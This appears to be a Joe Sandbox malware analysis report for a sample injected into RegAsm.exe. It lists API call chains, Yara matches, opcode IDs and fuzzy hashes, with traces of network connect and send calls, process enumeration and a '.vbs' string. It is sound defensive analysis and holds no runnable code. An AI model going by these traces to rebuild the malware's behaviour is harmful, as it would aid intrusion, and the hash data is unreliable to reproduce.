                                                                                                                              • Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA
                                                                                                                              • Part of subcall function 0041BFE5: IsWow64Process.KERNEL32(00000000,?,?,?,00475338), ref: 0041C005
                                                                                                                              • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                                                                                                              • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2180151492-0
                                                                                                                            • Opcode ID: 0b43284b76afbd96f76b9be0043a8eca87360fa06686d1bf4d8bb099c383738a
                                                                                                                            • Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
                                                                                                                            • Opcode Fuzzy Hash: 0b43284b76afbd96f76b9be0043a8eca87360fa06686d1bf4d8bb099c383738a
                                                                                                                            • Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 269201875-0
                                                                                                                            • Opcode ID: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                                                                                                            • Instruction ID: 5dce3a056f7b38871bf3701478ebec2c01ef4ac0d1e4adeac0a27022f106ca0c
                                                                                                                            • Opcode Fuzzy Hash: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                                                                                                            • Instruction Fuzzy Hash: 0741F536A012009FEB20DF78C881A5EB3F1EF89B14F2545AEE515EB341DB35AE01CB84
                                                                                                                            APIs
                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01), ref: 00451179
                                                                                                                            • __alloca_probe_16.LIBCMT ref: 004511B1
                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?), ref: 00451202
                                                                                                                            • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?,00000002,00000000), ref: 00451214
                                                                                                                            • __freea.LIBCMT ref: 0045121D
                                                                                                                              • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 313313983-0
                                                                                                                            • Opcode ID: c0c27e3fa0fc37b5352cac75d9871c7cd610c85ad5d081213d6c80f72d2fc676
                                                                                                                            • Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
                                                                                                                            • Opcode Fuzzy Hash: c0c27e3fa0fc37b5352cac75d9871c7cd610c85ad5d081213d6c80f72d2fc676
                                                                                                                            • Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94
                                                                                                                            APIs
                                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                                                                                              • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                                                                                            • _free.LIBCMT ref: 100071B8
                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.887505450.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.887477311.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.887505450.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 336800556-0
                                                                                                                            • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                                            • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                                                                                                            • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                                            • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                                                                                                            APIs
                                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 0044F363
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386
                                                                                                                              • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
                                                                                                                            • _free.LIBCMT ref: 0044F3BF
                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 336800556-0
                                                                                                                            • Opcode ID: be8aad2c18c16d35f713b979a96ac7f1c772162f60e003adf0fa877a85dcd87d
                                                                                                                            • Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
                                                                                                                            • Opcode Fuzzy Hash: be8aad2c18c16d35f713b979a96ac7f1c772162f60e003adf0fa877a85dcd87d
                                                                                                                            • Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9
                                                                                                                            APIs
                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                                                                                            • _free.LIBCMT ref: 10005BB4
                                                                                                                            • _free.LIBCMT ref: 10005BDB
                                                                                                                            • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                                                                                            • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.887505450.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.887477311.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.887505450.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$_free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3170660625-0
                                                                                                                            • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                            • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                                                                                                            • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                            • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                                                                                                            APIs
                                                                                                                            • GetLastError.KERNEL32(?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044829E
                                                                                                                            • _free.LIBCMT ref: 004482D3
                                                                                                                            • _free.LIBCMT ref: 004482FA
                                                                                                                            • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448307
                                                                                                                            • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448310
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$_free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3170660625-0
                                                                                                                            • Opcode ID: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                                                                                                                            • Instruction ID: 817e1e76de570c2b023109a843fda652767a1b5a915d0172e9d2adf04509528a
                                                                                                                            • Opcode Fuzzy Hash: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                                                                                                                            • Instruction Fuzzy Hash: 5601F936500B0067F3112A2A5C8596F2559EBC2B7A735452FFD19A22D2EFADCC01816D
                                                                                                                            APIs
                                                                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                            • lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                                                                                            • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                            • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                            • lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.887505450.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.887477311.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.887505450.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrlen$lstrcat
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 493641738-0
                                                                                                                            • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                            • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                                                                                                            • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                            • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                                                                                                            APIs
                                                                                                                            • _free.LIBCMT ref: 100091D0
                                                                                                                              • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                              • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                            • _free.LIBCMT ref: 100091E2
                                                                                                                            • _free.LIBCMT ref: 100091F4
                                                                                                                            • _free.LIBCMT ref: 10009206
                                                                                                                            • _free.LIBCMT ref: 10009218
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.887505450.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.887477311.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.887505450.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 776569668-0
                                                                                                                            • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                            • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                                                                                                            • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                            • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                                                                                                            APIs
                                                                                                                            • _free.LIBCMT ref: 004509D4
                                                                                                                              • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                                                                                                              • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                                                                            • _free.LIBCMT ref: 004509E6
                                                                                                                            • _free.LIBCMT ref: 004509F8
                                                                                                                            • _free.LIBCMT ref: 00450A0A
                                                                                                                            • _free.LIBCMT ref: 00450A1C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 776569668-0
                                                                                                                            • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                                                            • Instruction ID: 8e1836d4b3683ea2f551dac33bf8b94159c93f8dbbc189607f67f5fa0db289e6
                                                                                                                            • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                                                            • Instruction Fuzzy Hash: F3F04F76504600B79620EB5DE8C2C1B73D9EA0571A795891BF66CDB612CB38FCC0869C
                                                                                                                            APIs
                                                                                                                            • _free.LIBCMT ref: 1000536F
                                                                                                                              • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                              • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                            • _free.LIBCMT ref: 10005381
                                                                                                                            • _free.LIBCMT ref: 10005394
                                                                                                                            • _free.LIBCMT ref: 100053A5
                                                                                                                            • _free.LIBCMT ref: 100053B6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.887505450.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.887477311.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.887505450.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 776569668-0
                                                                                                                            • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                                            • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                                                                                                            • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                                            • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                                                                                                            APIs
                                                                                                                            • _free.LIBCMT ref: 00444066
                                                                                                                              • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                                                                                                              • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                                                                            • _free.LIBCMT ref: 00444078
                                                                                                                            • _free.LIBCMT ref: 0044408B
                                                                                                                            • _free.LIBCMT ref: 0044409C
                                                                                                                            • _free.LIBCMT ref: 004440AD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 776569668-0
                                                                                                                            • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                                                            • Instruction ID: c4ed0220327abb1134bcf7d54e43c2409a3611c90002b0fe773cef56a7474a4d
                                                                                                                            • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                                                            • Instruction Fuzzy Hash: 11F03AB18009208FA631AF2DBD414053B61E705769346822BF62C62A70C7B94ED2CFCF
                                                                                                                            APIs
                                                                                                                            • _strpbrk.LIBCMT ref: 0044E738
                                                                                                                            • _free.LIBCMT ref: 0044E855
                                                                                                                              • Part of subcall function 0043BD19: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043BD1B
                                                                                                                              • Part of subcall function 0043BD19: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD3D
                                                                                                                              • Part of subcall function 0043BD19: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD44
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                                                            • String ID: *?$.
                                                                                                                            • API String ID: 2812119850-3972193922
                                                                                                                            • Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                                                                                                            • Instruction ID: 94a4b4bbf586d133b1ca6d09685756ea089c4dad0dcc4a5060c65dcbb11523ea
                                                                                                                            • Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                                                                                                            • Instruction Fuzzy Hash: B951C375E00109EFEF14DFAAC881AAEBBB5FF58314F25816EE454E7301E6399E018B54
                                                                                                                            APIs
                                                                                                                            • GetKeyboardLayoutNameA.USER32(?), ref: 00409ED3
                                                                                                                              • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,01ED4948,00000010), ref: 004048E0
                                                                                                                              • Part of subcall function 0041C515: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041C52A
                                                                                                                              • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFileKeyboardLayoutNameconnectsend
                                                                                                                            • String ID: XQG$NG$PG
                                                                                                                            • API String ID: 1634807452-3565412412
                                                                                                                            • Opcode ID: 13efa8b9408afc5cc42d162c9968e61189070c1171a026b55621d28b7858676b
                                                                                                                            • Instruction ID: e0ccbd324811511655e6ba18c086c0ffec884fa52ef92f7e14ea490dcf81b303
                                                                                                                            • Opcode Fuzzy Hash: 13efa8b9408afc5cc42d162c9968e61189070c1171a026b55621d28b7858676b
                                                                                                                            • Instruction Fuzzy Hash: BA5133315082415AC324F732D852AEFB3E5AFD4348F50493FF44A671E6EF78594AC649
                                                                                                                            APIs
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                            • String ID: `#D$`#D
                                                                                                                            • API String ID: 885266447-2450397995
                                                                                                                            • Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                                                                                                            • Instruction ID: d0478598ef992627c852fcfbe86add3ca1c9fa58067414995f231753f3186543
                                                                                                                            • Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                                                                                                            • Instruction Fuzzy Hash: 78519071A00208AFDF18DF59C980AAEBBB2FB94314F59C19AF81897361D7B9DD41CB44
                                                                                                                            APIs
                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 10004C1D
                                                                                                                            • _free.LIBCMT ref: 10004CE8
                                                                                                                            • _free.LIBCMT ref: 10004CF2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.887505450.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.887477311.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.887505450.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _free$FileModuleName
                                                                                                                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                            • API String ID: 2506810119-1068371695
                                                                                                                            • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                                            • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                                                                                                            • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                                            • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                                                                                                            APIs
                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443475
                                                                                                                            • _free.LIBCMT ref: 00443540
                                                                                                                            • _free.LIBCMT ref: 0044354A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _free$FileModuleName
                                                                                                                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                            • API String ID: 2506810119-1068371695
                                                                                                                            • Opcode ID: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                                                                                                            • Instruction ID: 78b8e4ab202bb8962dfea6a4c95dea7b8c186c0554b41bb8e719afd17783d6d0
                                                                                                                            • Opcode Fuzzy Hash: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                                                                                                            • Instruction Fuzzy Hash: 2E31C471A00258BFEB21DF999C8199EBBBCEF85B15F10406BF50497311D6B89F81CB98
                                                                                                                            APIs
                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                                                                                              • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,63691986,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
